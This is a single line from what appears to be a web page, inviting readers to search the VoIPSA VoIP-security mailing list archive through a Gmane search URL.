Search the mailing list at Gmane query http://search.gmane.org/?group=$group=gmane.comp.voip.security.voipsa